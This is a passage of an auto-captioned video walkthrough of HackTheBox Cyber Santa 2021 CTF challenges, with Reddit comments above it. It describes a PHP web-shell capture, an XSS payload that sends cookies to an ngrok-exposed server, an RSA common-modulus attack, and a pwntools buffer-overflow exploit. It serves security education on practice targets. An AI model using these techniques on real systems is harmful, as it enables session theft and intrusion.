Day 1 - HTB Cyber Santa CTF: HackTheBox Capture The Flag 2021 (beginner friendly)

Reddit Comments

Thank you so much for this!

πŸ‘οΈŽ︎ 4 πŸ‘€οΈŽ︎ u/jesse-13 πŸ“…οΈŽ︎ Dec 05 2021 πŸ—«︎ replies

Day 1 challenges were easy but I still learned a lot by watching your walkthrough.

πŸ‘οΈŽ︎ 2 πŸ‘€οΈŽ︎ u/ClassicJoule69 πŸ“…οΈŽ︎ Dec 05 2021 πŸ—«︎ replies

Thanks for posting this. I started with the toy shop one and never got it so I gave up after that. I’m glad to see how it was solved because that was bothering me.

πŸ‘οΈŽ︎ 2 πŸ‘€οΈŽ︎ u/space_wiener πŸ“…οΈŽ︎ Dec 05 2021 πŸ—«︎ replies

I can't believe I didn't see that you could click on the elves' heads till I saw this. I was so confused with this challenge!

πŸ‘οΈŽ︎ 2 πŸ‘€οΈŽ︎ u/throwawayprivateguy πŸ“…οΈŽ︎ Dec 05 2021 πŸ—«︎ replies

It's not too beginner friendly. You've got to have some decent+ experience to solve 'em all.

πŸ‘οΈŽ︎ 2 πŸ‘€οΈŽ︎ u/sasebot πŸ“…οΈŽ︎ Dec 06 2021 πŸ—«︎ replies

I don't want to spam the HackTheBox Reddit with links every day (👀😅), so here's the day 2 vid: https://www.youtube.com/watch?v=deg0CQwwN-M + plz subscribe for more releases coming this week ❤

πŸ‘οΈŽ︎ 2 πŸ‘€οΈŽ︎ u/_CryptoCat23 πŸ“…οΈŽ︎ Dec 06 2021 πŸ—«︎ replies
Captions
In this video we're going to take a look at some of the challenges from the HackTheBox Cyber Santa capture the flag competition. It's running for five days and we've got five challenges each day, so I'm just gonna go through the day one challenges now. But let's just go and have a quick look at what the competition's about. You see here: global competition, five days, prize pool just over eight thousand pounds, solo CTF, jeopardy style, so just basically challenges, no kind of boxes to hack, and it's designed to be beginner friendly. It just tells us here basically it's gonna be five challenges released each day; you can see we've got five web, five pwn, five crypto, five forensics and five reversing. And on the 14th of December I believe there's going to be a live stream, yeah, the 14th, with walkthroughs and Q&A on YouTube, so that'll be worth checking out, some great creators here. But yeah, anyway, let's go over and take a look at the challenges. I'm going to go over these in the order of the number of solves at the moment, so the one with the most solves is the forensics challenge, Baby APT. Let's take a look at it.

The description says: this is the most wonderful time of the year, but not for Santa's incident response team. Since Santa went digital, everyone can write a letter to him using his brand new website. Apparently an APT group hacked their way into Santa's servers and destroyed his present list. Could you investigate what happened? So we've got a pcap file to download for this one. I've already got it downloaded, let's have a look at it here. See here, a pcap; we can open this up with Wireshark, or you could do it with tshark or something if you wanted, but it's a bit easier to see what's going on in Wireshark. The first thing I normally do is go to Statistics, and we can have a look at the file properties and the protocol hierarchy. Conversations can be quite good here as well, just depending how hard it is to find the flag. In this case the first thing I'll do is go to the protocol hierarchy, just to see what sort of data we're dealing with, and we've got HTTP, which is likely to be of interest to us unless there's some kind of DNS exfiltration or something like that. So I'm just gonna select this as a filter; you can also just type http at the top to do this, and we can see some HTTP requests. We're going to follow this as a HTTP stream and we can see that there's been a POST request, this register. I don't see anything in here that would represent a flag. Let's go back and do the same again; I'm just going to filter that by http. We also have this POST request to bg.php, so let's take a look at that one. We can see there's actually a command sent, so there's a PHP file, looks like some kind of shell, and you can send a POST request to this PHP file with a command specified as the POST parameter. In this case they've tried to cat out the /etc/passwd file and they've actually got it back as well. I still don't see anything there which could represent the flag. I'm going to close that again. We had a few of those POST requests, so presumably we've got some different requests that are being sent off, some different commands that are being sent to that PHP shell, and right enough, if we get to our last command here, we can see that this is encoded at the moment. So we've got some URL encoding, which makes it a little bit harder to read. Let's go to CyberChef, throw that in here and say we want to URL decode it. That makes it a little bit clearer, and we can see that it's removing an sqlite file and it was also calling echo with what looks like a base64 encoded string. So I'm going to copy that and replace this here, get rid of our URL decode, we'll go to base64 decode, and now we get our flag. Also, any time you don't know what that encoding is, you can go and try some different base encoding methods depending on what their character range is here, and also even for base64 you can change the alphabet here, so sometimes maybe a different alphabet's been used to encode it. But what I was going to say there is, if you really don't know the encoding and you're out of ideas, you can try to throw this at CyberChef's Magic and it'll try some different decoding methods; you can see that it identified that this was base64 and brought back our flag as well.

Next up is the web challenge, which is called Toy Workshop, and the description says: the work is going well on Santa's toy shop. We lost contact with the manager in charge. We suspect that evil elves have taken over the workshop. Can you talk to the worker elves and find out? So for this one we've actually got a Docker container to launch, which I've started as well, and we can download the source code as well to take a look at it. This does actually come with a build docker script, which we can use to get this working locally. So sometimes if you're working on a CTF the server can be quite slow, or you might be sharing instances with other people, or you might want to modify some of the source code to try and help debug the challenge if you're not able to solve it; those are the times when this is particularly useful. I'm going to try and launch this, but it might take a while to boot up, so let's see if it's done by the time I take a look at the code. I'm going to open up the code with Codium. Another thing to mention with the Docker is, sometimes if you're doing challenges where you want it to make a callback, you have to remember it's inside a Docker, so if you were trying to make a callback from a HTTP service for example, it's not going to call back to your VM, to your localhost, as you would expect it to; it's going to be restrained to that Docker, so you would need to get into the Docker shell in order to see any of those callbacks, if that makes sense. Maybe it doesn't, but basically in some cases I think, if you know how to solve the challenge, it's easier just to go straight to the site than it is to get things working in a Docker, particularly when it comes to web challenges, but maybe that's just me. I've opened up the site here anyway. Let's go and take a look at the code. Sometimes there's interesting things in the configurations which can give us a clue as well. I've seen cases before where there was like a log poisoning challenge and you could tell, because of the way the logging had been set up in the configuration, that that was going to be important.

So let's start off here: just open up the pages we've got here. We've got some of our views here; this isn't going to be too important to us, it's the JavaScript that we're going to be interested in. So in our routes here we can see that we can make a POST request to api submit. We can make a GET request, obviously that's going to render the page. We can make a POST request and supply a query as the body, and it's going to call this bot read queries, db add query; you see here db add query, it's going to try and add it and it's sending that over to them. If we don't send anything it's telling us basically please fill that in. All right, so that's one of the options. Another option is we can get queries, but if we do that it's going to check first to make sure we're calling from the localhost. So if we're running this on the remote server our IP address isn't going to be 127.0.0.1, unless we can find some way to forge that; sometimes that can be through using headers and things like that, or in some cases by forcing the user who is the localhost to perform some action for us. So queries is basically going to call result render queries; it's going to grab the queries from the database. So let's go and take a look, where is this database? We've got our database.js. All right, so when this is set up we have id, query, created_at, okay. Add query is going to insert whatever values are provided and then get queries is gonna select all. Okay, that's fine.

Let me just go back to this, our main index.js. Let me go back to see what this bot was about, because we have this bot.js. So we had bot.read queries whenever the POST api submit is called, and if you have a look at the bot, this is basically a browser which is being set up using Puppeteer, and whenever this is launched, whenever the bot's created, it's gonna create a cookie with our flag in it. This is obviously a fake flag for the local testing, but if we're doing it remotely this will have the actual flag in it. So the bot's created, it has the flag, it's going to visit the localhost, we've got set cookie, and then it's going to go to queries. So let's just run over that again. We've got our index.js here; we send this POST request, it's going to add the query to the database, which we have here, we can see add query, it's going to insert our query here, and then it's going to call read queries. So it's adding the query and then it's reading the query, and if we go to the read query, this is actually going to, well, we know that, that's too many files for me to keep track of, it's going to select all from queries and then it's going to resolve that. So it's actually going to load whatever we insert there, so if we were to insert some HTML or some JavaScript or something like that, it's going to insert it into the database and then it's going to try and load that as a page. So let's try and steal the flag from the cookies.

Let's go over to our workshop. We can basically click on one of these elves to get this message up and we can send something; let me just send that test as an example. It says it's delivered successfully. We can go and have a look at Burp Suite and see the POST request; we can see, yep, this was sent off. We could send that to Repeater and start playing around with it. What I'm going to do is just go ahead here and insert a script, so let's do script tags, let's close that off as well, and in here, well, there's a lot of different things we could do. We could have it load as an image from our server and have like an onerror alert or something like that whenever it doesn't find the image, and it'll send us a cookie. What I normally do is just set this to document.location equals, and then we're going to give it a location to visit, and the location we want it to visit is going to be our server. So I've got an alias here, webup, which I'll show you what the alias is: grep webup from my aliases file. So this is just to create a HTTP server on port 80, in case you ever see me running that and wonder why it doesn't work for you on your local system. So that's going to get that running, and now what we want to do is expose this to the internet as well, so we could use something like RequestBin; you can see I have RequestBin here, which you can go and log into and basically it'll give you a proper server, not just a local IP address, for it to connect to. But what I normally use is ngrok. Just type ngrok here to get some examples up; you can see here we can run ngrok and provide a protocol, provide a port, and some other options we can provide here as well, and this will expose local network services behind NATs and firewalls to the public internet over a secure tunnel, which is exactly what we want to do, we want them to have access to this. Be careful, because obviously anybody that has this ngrok address will also have access to whatever you have on your web server. In this case I'm inside this web toy workshop directory, it doesn't really matter too much, but if you were on your desktop and you've got some other things in there that you don't want people to have access to, that's something worth bearing in mind. So I'm going to do ngrok http 80, because that's the service I want to expose. It's going to give me an address to provide here, and I'll just show it as an example: if I go to this address now in a browser, in Firefox, it's now giving me access to this local directory; you can see in here we saw the request that was made, and here in the HTTP server we've got running you can also see that. So let's go and provide this then as the URL. So it's saying to execute this JavaScript, which is going to change the document location, it's going to change the address to our server. We don't just want it to access our server, we also want to get a flag, a cookie, so here we can say, then we'll close this off and we'll say plus document.cookie, and hopefully this will be it. Let me take a copy of it in case there's any problems. We send that off and hopefully this is going to store it in the database; it's then going to query the database and load whatever's in there and execute it, and whenever it executes it, it's going to go to our location and it's going to send its cookie as part of the query. So if we go and take a look at our local HTTP server, it took a little while to come through, but you can see here we've got our flag, which is HackTheBox evil elves are rising up.

The next challenge is called Common Mistake. It's a crypto challenge and the description says: elves are trying very hard to communicate in perfect secrecy in order to keep Santa's warehouse. Unfortunately the lack of knowledge about cryptography leads them to some common mistakes. And we've got one file to download in this case, it's called encrypted.txt, and you can see in here it's actually in JSON format. Let me move that to enc.json, oops, move encrypted to enc.json. Let's open it up in Codium, hopefully we get a bit better formatting. Oh, that's not what I wanted to see; let me move that to enc.py, obviously, try and close that down. All right, slightly better, we've got a bit better format here anyway. Basically we've got a couple of different objects; we've got two objects, each of them has an n and each of them has an e and each of them has a ct. So we've got a modulus, we've got the encryption value and we have our ciphertext for each of them. Despite my handle being CryptoCat, I'm not really a big fan of crypto, so I'm gonna skip through a lot of the details here, but if you want to learn about this attack type there's an article here on common modulus, which is basically the issue that we have here. So if you take a look at this here, it's a scenario basically where Eve has two different ciphertexts of the same message m: they've been encrypted with a different exponent but a common modulus. So in our example here the flag has been encrypted with the same modulus but two different encryption values, two different exponents. So you can go and have a look into the maths here, something I'm not going to cover at all here, but we've also got a script which you can use; in fact this might be the script that I used. Yeah, okay, so this was a script that I used, which you can provide the modulus, we can provide the two exponents and we can provide the ciphertext. Oh no, sorry, this is the one. So it takes type long, so actually if we try to use this it won't work, we get an error, something to do with, I think, recursion or the long being too long or something. So this didn't work for me, so let me just run through the solution that did work.

There's something called RsaCtfTool which, I wasn't actually able to solve the challenge with this, but I did use it at the beginning to generate some of the parts that we need. So this tool can be used for a variety of different attacks; you can specify the attack that you want to use or you can let it run through all of them. The problem I normally have with this is that there never seem to be the right options for the values that I have. So in this example we do have a common modulus, I believe; let me search here, common: common factor between ciphertext and modulus attack, common factors across multiple keys, but whenever you go to specify them there doesn't seem to be an option to provide the multiple modulus and the multiple ciphertexts. You know, we have --uncipherfile or --uncipher, but we don't have an option to provide two different ones as far as I can see. Maybe somebody, if you can let me know in the comments if you used this tool to solve the challenge completely, that would be good. But what I used this for was to create a public key, so we want to create two public keys here. This isn't necessarily required depending on how you solve the challenge; you know, different scripts will take in different formats. The reason I did this was because the script that I did find to solve this takes in the ciphertext and it takes in your public keys, and we don't have public keys at the moment, we've got the values to create the public keys. It also takes in the messages as base64 as well, so that's worth bearing in mind, and hopefully then this will get us a flag. Let's download this Python file; in fact, let's go and do what we need to do with RsaCtfTool first of all. So we'll git clone it. To get the full features out of this you need to have a lot of stuff installed, like SageMath, which I'm not going to install because it takes ages, but I'll just do a pip install of the requirements for whatever Python modules it needs there; it probably doesn't need all of them to create the key, to be honest. But once we've done that we can create our key. Let me just show first of all: if we just run python RsaCtfTool.py it gives us all the different options and things that we need here, or that we might need, and we want to do the public key, which is going to be python RsaCtfTool.py --createpub, and then we want to specify our n. I'm not sure if we can provide this in hex or we might need to format it; okay, it looks like we can do it in hex. So the n is going to be the same for both, it's just the e that's going to be different. Where's the, okay, this one: we've created our first public key, so I'm gonna do subl key1.pub. I just accidentally copied a blank space and pasted it. All right, there we go, and then we want to do the same thing, I'll just type it out again, it's gonna take too long deleting that: python RsaCtfTool.py --createpub -n, oh, it's not gonna take long because the n is the same, what am I talking about. All right, so we'll just go back and grab that command, and it's 0x23 for this one. We create our public key and that's key2.pub; save that. Okay, so now we want to grab the other script as well. I'm just going to go and take a copy of that here, wget, and we need to make sure our ciphertext is base64 encoded as well. So at the moment it's in hex format; I'm going to take this, we'll say From Hex, so making it raw, but now we want to say To Base64, and that's our first ciphertext. I'm going to save that as c1; oh sorry, I'm going to change that to c1.b64, it probably doesn't really matter, but I noticed that was the format that they were using in the script. And we need to do the same for our second ciphertext, so we'll do c2.b64, paste that in, and now we should be able to run this new script. Let me get rid of CyberChef in the background. So we'll do python, and it's called rsa cm, common modulus, and we can pass in, let me see, does it give us the options there? Yeah, so we can pass in our c1 ciphertext, which is going to be c1.b64, pass in our c2 ciphertext, c2.b64, our public key one, so k1 is key one and k2 is key two. Let's try and run it and we get back our flag. So there's probably quite a few different scripts out there to do this which take your data in different formats and stuff like that. I also noticed with some scripts that you get some errors around the recursion depth or around the length of the numbers and stuff like that, but if anybody solved this with RsaCtfTool alone I'd be interested to hear how you did it.

The next challenge is called Mr Snowy. It's a pwn challenge and the description says: there's snow everywhere, kids are playing around, everything looks amazing, but this snowman scares me, he's always staring at Santa's house. Something must be wrong with him. So we've got a file to download, a binary, so we can get this working locally and then we'll be able to connect to the server afterwards. Let's go and take a look at it. We've got a flag here as well, a fake flag for testing; just have a look at that. We see here we've got a 64-bit LSB executable which is not stripped, which means we'll be able to see all the original function names and stuff like that; it's still got symbols in it. We can run something like checksec to determine what protections are enabled on the binary, so we can see some of that here; it would mention if it had PIE, and we can see the stripped and stuff like that, but we can also see here there are no canaries found. So if there was a canary found and we were overflowing the buffer, we would need to make sure that canary doesn't get overwritten with a new value; so if this did have a canary and we were doing a buffer overflow we'd basically need to leak the canary and overwrite it with the correct canary. Nothing to worry about, because there's no canaries found. We've got Full RELRO here, so this just means we're not going to be overwriting elements of the global offset table; again, not too relevant here. And NX is enabled; this is a little bit more relevant, so if we overflow the buffer we're not going to be able to inject any shellcode onto the stack and expect it to execute, it'll be marked as data only; but that's again not too important for this challenge. And finally PIE: as I mentioned, we would have seen that here whenever we check the file type. PIE just basically means that the program will load at different memory addresses each time, but in this case there is no PIE, which means it's a fixed address; the addresses will be the same on the server and on our localhost, and we can basically just provide the addresses, we don't need to worry about leaking offsets and things like that. Sorry if that was a bit too much for anybody who's not done any of these pwn challenges before; none of that's really too important for us, but I just thought I'd cover some of these protections before we get going.

So let's make the file executable, where is it, Mr Snowy, we'll make it executable, let's try and run it and just see what happens. We have some animated input. While this looks really cool in the terminal, it's extremely annoying when you're trying to test the binary, because obviously we have to wait for the menus to load up each time. We can say "let it be" here and it'll just exit the application, which means whenever we run it again we need to wait for all that animation again. The other problem is, because it sends these characters with a slight delay between each one, if you're running a script and you're trying to debug it, like pwntools for example, it will print out a lot of output for each character that it sends, which can make things look a bit messy. Obviously we want to investigate, because "let it be" just took us out of the menu, and then we can deactivate or we can break it. Let's try and deactivate: it says you do not know the password, mission failed. All right, so obviously we need to break it if we want to get any further with that menu. So we're just doing a little bit of black box testing here, without looking at the code or trying to disassemble or reverse engineer it, just playing around to see what these options might do. So what did we try? We tried to deactivate; let's try to break it: it says this metal seems unbreakable, the elves seem to have put a spell on it. So both of our options there said mission failed, so let's go and take a look at the code in Ghidra.

So we open up Ghidra; we've got our decompiler on the right, we've got our assembly code here, you can access the sections of the binary here, and we've got all of our functions, our imports and our exports and stuff here. We want to jump straight into our main function typically, and go and have a look here. We've got setup; most of this stuff is just for the visual stuff that they have set up there. We've got this banner which is going to print out this snowman, and you can see why, when it's running through all this stuff, that makes debugging a little bit hard, because you have to kind of watch all this happen in the debugger. But we go back, our main functionality is here in the snowman function, and we can see, what's this print string? It's going to print out the string which is in the data section of the binary; you can see here on the disassembler what it's printing out. And then we have a buffer up here which is defined as 64 bytes. It's going to read in, so it's actually going to read in only two bytes here, it's reading two bytes into our buffer of 48 bytes, so there's no buffer overflow there, right, two bytes fits inside 64 bytes, so there's no issues. And then we have this atoi; this is like converting a char to a number, so we're providing a menu number, it's converting it to an integer, and then it's checking to see what the integer equals, and we'll either investigate or exit, because remember that first time we hit two and it just exited, so that's what's happening there. Let's go and have a look at the investigate function. So for investigate we've got another buffer which is defined here, 64 bytes of characters. It's printing out another message, so that's just printing out our menu option basically to us, and then it's going to read in, but look what it's reading this time: it's reading in 108, and that's in hex as well, so we can actually go over here and highlight that in the disassembler and see that equals 264 in decimal. So that means it's reading in 264 characters into this local_48 variable which is 64 characters, so there's a clear buffer overflow there, right? If we overflow these values we'll be able to overwrite the return address, so that whenever it returns from this function it returns to an address of our choice, and that address might be to some shellcode or some ROP gadgets or something that we have lined up, but obviously in this case there is no shellcode to execute, so we need to have a look around and see if there's any other functions of interest in here that we might want to jump to. Apart from that we have what we saw there, so we know that whatever we provide it exits: we provide one and it's gonna exit, we provide two, it's gonna exit, so there was no way to get any further through this menu, we had to exploit this buffer overflow. And if we take a look at some of the other functions here, I guess we need to try and find out something of interest. We've already looked at investigate; the printing is not going to be interesting; snowman; we can go and flick through these, but we see that we have this one, deactivate camera, and if we right click this and say show references to, it's not actually being called, there's no unconditional calls to this function, and if you take a look at it you can see that basically what it's going to do is open a flag.txt; if it's not there it's going to print out an error, and if it is there it's going to print out the flag. So right there we've got an address; we can go and grab this address here, 401165, and provide that as the address to overflow the buffer, or we can go and put together a pwntools script, and that means we'll just be able to access the actual function names as well, or we could still use the address, however you prefer.

So let's go and verify how many bytes we need to overwrite. If we go back to our snowman function, we will investigate, and in investigate we can kind of work this out from the stack, but it's also possible to do this in GDB using the cyclic function from pwntools. So I'm going to open up gdb with pwndbg and pass in Mr Snowy, and what I'm going to do is generate a... just to mention here, we can also access all of our functions and stuff in here; we can go and disassemble deactivate camera, for example, and see that we can get the addresses and stuff here that we might need to do our buffer overflow. We can also access a lot of useful functions in pwndbg; if you just type help and then pick something to get more help on, so you can do like help obscure and it'll give you more things that you can then run help on. You can also just do a tab here and get a list of other functions that you can call. So there's a lot of stuff you can do in here and a lot of functions you can access from outside; for example, we can get into radare2 from here as well: just do r2, aaa to analyze, afl to list the functions, and then we could go and select one of those and disassemble it with pdf. So if you like using radare, that's an option in here, but oops, I closed the whole thing down. But yeah, I'm just showing a few things you can do there in case. You can also do pwndbg, as it says here, pwndbg filter for a list, and this will tell us a lot of other things that we can do here as well. But what we want to do in this case is run cyclic, and you can see here this generates a very big cyclic pattern; we don't want one that's that big, so I'm going to say cyclic 500, even though that's kind of well over what we need as well; we know it's going to be like 60 or 70 bytes based on the size of the buffer. So we generate a cyclic pattern of 500, we'll run the program, we still have to wait for it to do its animations, and we want to investigate. It asks us then, do we want to deactivate, do we want to break it; we don't want to do either, we want to pass in this cyclic pattern and see where the crash happens. So we provide that and we can see then it's crashed; we have at our instruction pointer here the address that it would try to access, saaataaa. The reason it's not in the RIP, it's on the RSP, is because in 64-bit it won't try to access memory addresses that are illegal, basically, that can't be a valid memory address, it's not in the correct range, so it won't even put it into the RIP. If you were doing a 32-bit challenge you would see it go in here, you'd see only four characters, because obviously it's half the address size, and it'd be in the EIP. Now that we know it's saaataaa we can just grab some of this and say cyclic -l to look that up, and it'll tell us that the offset is at 72. So if we write 72 bytes and then the address of this deactivate camera function, it should overwrite the return address and send us to that function.

So to do that I'm going to put together a pwntools script, and I'm going to copy over a template which I always use for all these scripts. So we'll just create this and call it exploit.py, and let's open this up and make the changes we need to. So for anybody who's not seen my pwn videos before, go back and check them out, because I'm going to cover this in a lot less detail than I have in the past, because I've probably got some repeat viewers who are fed up with hearing it. But this template allows you to easily swap between debugging in GDB, connecting to the remote server, which you're going to need to do soon, and testing locally, because we have this GDB option here. We can also set up a script here to set up breakpoints at different locations; we could say we want to break at main or something like that, and then once that's up and running we don't have to basically go and make any changes to the code to swap between these three options. I also added this find instruction pointer function in here, which is basically just going to do what we just did in GDB; you can see here we're doing a cyclic pattern and we're calling this function. So let me just show how this works. First of all I'm going to change this to Mr Snowy. Also here we have the context binary being set, so this is basically going to identify whether this is 64-bit, whether it's Windows or Linux etc., so that later on it'll know what the context is, and if we don't provide a context it'll default to the one that the binary is. Now we've also got debugging here; this is going to look horrible, so I'll show you what happens because of the animations. And apart from that, let's just comment out, let's get rid of some of this stuff that's not needed, take that out, and I'm going to comment this out, so all we're doing to begin with is just trying to identify how many bytes we need to write to overwrite the return address. So it's going to launch the program here, and after the send, it's going to sendline after the angle bracket, which is what we do see whenever it sends the... let me go back to, I should just run the program, but you see here the last thing it will send is this angle bracket. So after that we want to send the payload, but actually we don't want to send the payload, because we want to first make sure we get into the right menu. So remember that first it asks us, do we want to break it or do we want to do something else; we want to say, after the angle bracket the first time, we want to send a one, I believe it was one, the two will exit. We're going to send that, it's going to wait for another angle bracket and then it's going to send the payload, which is going to be our cyclic pattern of 500 bytes, and then it's going to wait for the program to crash, and then it's going to read the core file which is dumped and it's going to grab that stack pointer to find the offset. If you're dealing with 32-bit you just need to uncomment this line and then comment the 64-bit one. So if we run this now, python exploit.py, you see we get this horrible output because I have it on debug mode and it's sending each character with a slight delay, so we wait for all that to complete, but then we see that it does the cyclic pattern and it reads the core dump and it finds that the offset was at 72. So this is just this saaataaa value that we saw in GDB as well, so everything I did in GDB there in terms of identifying the offset, and the same in here, kind of looking at the size of the stack, you can see the variables here, isn't really needed; you can just use the function in pwntools to do that for you.

And now that we've done that, let's go and finish off the payload. So we're going to start the program and we're saying here we want to build up a payload at this offset, which is going to be 72, we want to send the return address. So we could go and grab that address that I mentioned here, so we could go and put in here 0x4..., where did it start there, let me go and grab this. So yeah, one way you could do this would be to provide this, and you don't need to worry about the fact that it's 64-bit and we should actually be doing all these zeros, because we've told the program what the architecture is here, so it'll default to 64-bit. flat is basically going to flatten lists and tuples and strings and numbers and things using the pack function, so basically using the context we have set there. There's a lot of different ways you can do this syntax-wise, don't worry about it too much, but basically we create that payload and then we're gonna do the same thing again: we're gonna say we want to press one on the first menu and on the second menu we want to send our payload. I'm also going to go and turn that debug mode off so we can actually see what's going on, and we run this. We have to wait obviously for it to go through the find instruction pointer function, we just don't have all the output now, but that's exactly what it's doing: it found the 72 bytes and now it's launching the program again; this time it knows where the instruction pointer is going to be, so it sends that off and we get back our fake flag for testing. Now the awesome thing is, because we have this script set up to swap between local and remote, we can literally just say
remote paste in the server address and the port number and send this off and it should come back with our flag i've been getting this warning a lot so i see that phone tools have updated you see here they've actually given a link to the bytes section it's kind of annoying because i just want to kind of disable this message to be honest but um i think where what do we need to change we need to we need to change something else here to i think like encode the payload or something i don't know so we've got back our flag here nice try elves but not good enough one other thing i forgot to mention there was that we can we don't have to provide the address here so because we're loading the binary we can also say elf dot functions or elf dot symbols and then we can also provide this as like this kind of syntax as well so for us we wanted to deactivate camera so i'm going to deactivate the activates camera and that should do the same thing for us in fact let me also just go here and say pretty print dot symbols so just show everything that's there as well might as well look at something while it's spending two minutes connecting to or doing the animations okay we're still going to wait for the offset should have just gone and changed that to 72. 
okay so you can see it's printed out all of our symbols here um so we can whenever we say that we want to access one of these functions rainbow for example it's given us the address here as an integer so it's mapping those okay and you can see we also got back our flag in this one as well the final challenge is called infiltration it's a reversing challenge and the description says we got hold of an internal communication tool being used by the elves and managed to hook it up to their server however it won't let us see their secrets can you take a look inside so we've got a docker container for this and a downloadable part i actually spent a long time on this challenge not realizing there was a docker container until i saw it mentioned in the discord and then went and checked uh so it caused a great deal of confusion i really couldn't understand where the flag would be coming from in the code that we have but let's go and take a look at it i'm not going to jump straight into the solution i'm kind of going to go through some of the stuff that i was going through before i realized the docker container was there and stuff like that let's see what we've got we've got this client uh let's might be executable already but let's go ahead and make it executable and try and run a client tells us we need a server and a port let's do localhost 13337 connection refuse so let's make sure we're listening on one three three seven listen on one three seven we run that again and now we don't get any errors we go back to our netcat and you can see we've got a connection from our local host on four zero nine one six let's try and send something say hello it came out two at symbols and it reversed the hello that we sent nothing happened on the server uh sorry not on the server well obviously this is our this is a it's called client so client we're providing a server address and port number to connect to and we enter in something else okay let's just come back with the full string now 
and it exited the application we could try it again we could try and enter in some different values and see what we get but again we just see that's being reversed and yeah nothing else happens then we might also want to try and do something like l trace which we can use to see what's going on the background oh we need to make sure we have our server running and let's try and put in now hello and okay so we can see it's doing the send and receive and it's not really showing us anything else there all right so let's go and take a look at the code we could have a look at this in gdb or adair or something i'm going to go over to geardrive because we get our decompiled code as well which is a bit easier to read okay so we'll jump straight into our functions here we this binary is stripped so whenever we look at the phone challenge there let's check the file type again you see this one actually is has got pi enabled and it's stripped so instead of seeing the main function there and the names of all the functions it's just been given the offsets as the names pi being enabled as well so let's just do check search just of interest so all the protections are enabled there we don't have full railroad but we have canary found we have nx enabled and pi enabled so a sea of reds obviously this isn't a binary exploitation challenge so we would expect those protections to all be there but just wanted to compare that with the last challenge that we went through as we go over to our entry function we can just click the function here that's going to be opened up you can see just an idea of what's happening it's asking for the server and the port number if we don't provide something we're going to get some errors socket error or we're going to get this error here if we provide everything our server report and it's able to connect it's going to call this function as well we could go through and start renaming these functions you can use l to rename it or we can start inserting comments 
around once we kind of work out what they're doing but there's not too much happening here we have this ivar one it's calling function and the value that's being returned if it comes back and it's not 0 it's going to return if it is 0 it's going to go down to this next function here which is going to do some other stuff here we can see untrusted client location enabling opaque mode we can see we have our canaries here as well so remember on the last challenge it was talking about the canarys basically this is set up this local 10 is set up at the beginning of the function and it's set to a random value basically and then whenever it gets to the end of the program it's going to check to see whether this still equals you can see here it's checking does it still equal what we assigned it to at the beginning if it doesn't then it means somebody has over written the value on the stack and then it's just going to exit the program so if we if there was a buffer overflow here and this was taken in 1032 bytes but if it was reading in say 2000 we would need to overwrite the we need to find out what this canary is and then we need to overwrite the value on the stack with the correct canary to make sure our buffer overflow succeeds a bit of a detour there um but just uh in case anybody's new to binary exploitation it might be of interest uh we can flick through the functions here's actually quite a lot of functions so some of them aren't going to be necessary for us let me go back to the entry let's go back in here and this is the function that we're going to be interested in because this is what it's going to first and there's a lot of stuff happening here but um i find it easier to kind of work out what's going on by running this with a script i actually put together a little phone tool script to send some input and then return it and we can set up breakpoints and stuff there but essentially this is reversing our input as we saw whenever we typed hello it comes back with a 
reversed input so it's gonna do that we've got our param1 here it's going to receive in another value and then it's going to perform some xor as you can see it's making sure the length of it is 32 same here so it's reading in 32 bytes gets another 32 bytes and starts doing some xor operations and then it's going to send the value back that's been xored and there's some negation here with this uint conversion so i didn't realize there was a server to begin with so i was trying to work out whenever we send this stuff off where is the flag actually coming from because it takes an input from us and then it takes another input and then it does some xor operations but it's not it's so it's always our inputs not we would have to completely guess the flag or know the flag um so obviously i was approaching it wrong we we do have a service connect to and the server has the stuff we need but let me just actually show the pontool script that i put together because it's a little bit different structure in these scripts whenever you have a client and you have a server so you see in this case we have to do our nc nlp set up a listener on port 1337 so if we're using pro tools we also need to do this as well as launching the client so let me just create a exploit.py i'm going to copy this over and this is just the same template that i use in the previous example you can see i've got some break points set up here so it was breaking at some different locations in the program to try and see what was going on at the time the reason i don't just have break and then the full address is because that pie is enabled so whenever we look at these addresses here they're actually just offsets and we won't know what their actual full address is until we run the program so this is basically just set to run the program and as soon as the program starts running it's going to set up these break points for us break rva is going to break at this offset from the pi base you can get the pi base just by 
typing pi base and gdp power debug and it'll it'll show it and then we're setting up a listener here on port one three three seven we're gonna start our program and pass in the local host on one three three seven and then we're gonna set this client to wait for the connection so the the issue obviously for for me here was that i was trying to do this all locally not not realizing we did we had this remote server but essentially i sent off some value we know there's 32 bytes we need to send off and then if that's done properly it'll ask for another 32 bytes and i was just sending this off to try and work out what was actually happening in the background let's run python exploit we send it off and we see okay so we sent this off it's reversed our first input we send off another input and it does some xor operations and we get a value back if we were to do this with the gdb pawn debug so all i need to do now because i've got those breakpoint setup is just type gdb at the end it opens up gdp in another window it's set up our breakpoints and it's currently hit a breakpoint and now we can go and actually have a look at what was what the instructions are i can't remember exactly what break point i set up here um let's hit continue you see here so you can kind of go through instead of break points of whatever you think might be interested interesting in this case we have a compare i think this might be around um too many windows open i think this might be around the main function entry um so this part here i believe one seven four eight let's have a look one seven four eight um no okay somewhere else but yeah i can't remember exactly what these break points were ourselves but just to show how we can do this we can also then as we get to places you know if for example we return from that from this function and this doesn't equal sorry if this does equal zero no if it doesn't equal zero it's going to return so if we return from that function and that did equal zero all we 
need to do is go and set up a breakpoint here where it's going to do that test or it's going to do a compare and then just go and modify that in gdb so for example if this rax is set to zero and we need it to be set to a one we could just do here set rax equal zero x1 you can see here then that the rax has been updated and then we would just hit continue or hit next and let it keep going through what it needs to do um so that's a little demonstration of how this phone tool script will work with gdb this didn't help anyway didn't help me get the flag because obviously we need to go and do this against the remote server and if we go and do it against the remote server the output's a little bit different let's go and test it out okay i'm going to close this let's go and get the server address and port number we'll do netcats and it comes back with this output and we can try to enter something in it just comes back with the same issue we could actually try and do even if we do 32 bytes let me go and grab this this is 32 here you can see down here 32 selected because that's what they needed to be but if i go and enter this in now as the second input it doesn't actually take it and the reason being whenever this is done it shows up as like a the length has been 1 instead of the length being 32 i noticed that whenever i was debugging it but if you do this inside of pawn tools it won't do that so if we launch a script and connect to this server address and port number and then send these to off it will come back with two different values it does that xor thing uh but it's not though it's not the way we want to approach this anyway let's we know that the server is going to be loading the flag which we don't have on our client so let's uh let's go and set up a break point around this function which is one seven five three and we can let's run the program we're gonna run the program with this server address and port number actually i'm going to do gdb phone debug pass in the 
